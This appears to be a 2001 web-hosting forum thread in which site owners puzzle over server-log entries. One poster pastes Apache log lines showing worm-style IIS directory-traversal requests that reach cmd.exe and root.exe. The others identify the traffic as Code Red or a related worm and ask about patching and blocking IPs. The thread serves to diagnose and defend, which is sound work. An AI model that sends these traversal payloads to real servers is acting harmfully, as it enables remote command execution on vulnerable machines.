I noticed in my stats somebody attempted to access this file, which does not exist. Is this something sinister?

http://www.mydomainnameremoved.com/scripts/..À¯../winnt/system32/cmd.exe

It is a Windows shell..... yes, sinister.

If I remember correctly, Code Red infected machines are venerable to this exploit.

Ah, I think I am probably relatively safe then, as I am not running a Microsoft server.

I traced the IP address and reported it to wanadoo.fr

Can't imagine they can trace a person merely from a log entry though, as all it has is their IP addy and what they tried to do, along with mundane browser info.

Thanks for the reply.

Oh, I meant to ask, is this more likely to be an individual specifically targetting my site, or some web-bot who just managed to stumble across it?

hmm. I got it to? Maybe a new kind of code red worm??


216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

Hi acetate,

From what I gather it's something which exploits a security loophole on Microsoft servers. there is a patch available.

If you do a search for "logs cmd.exe" on dejanews there's quite a lot of info about it.

Thanks for the info.. Luckily I'm not running a windoze server but it's annoying to see my logs filled up every 10 seconds with this windoze exploit.

I believe this is a new MS worm out in the wild, based of course on the same exploits. It looks like it is looking specifically for already infected machines (CR2 opened up a cmd.exe hole).

Dang, looks like I missed being first :bawling:

Oh well, chalk up a few more web servers to un-protected web "transactions"

http://www.webhostingtalk.com/showthread.php?s=&threadid=21413

Can the users connecting to a linux box slow down the http?

I've seen some people saying that these visits increase the system load with http PIDs.

I certainly noticed mine was slower, but I don't know if that's why

code red 2 ?
http://www.symantec.com/avcenter/venc/data/codered.ii.html

http://www.sitepointforums.com/showthread.php?s=&postid=247906&t=8493#post247906

Code red has tried to attack 7830 times. as at 09-19-01 17:57
Code Red II has tried to attack 16794 times. as at 09-19-01 17:57

:rolleyes:

I have noticed this is always the same (or very similar IP block) contacting me with this. Is there a way to prevent this Ip address contacting my server in the first place?

I am using a RaQ3.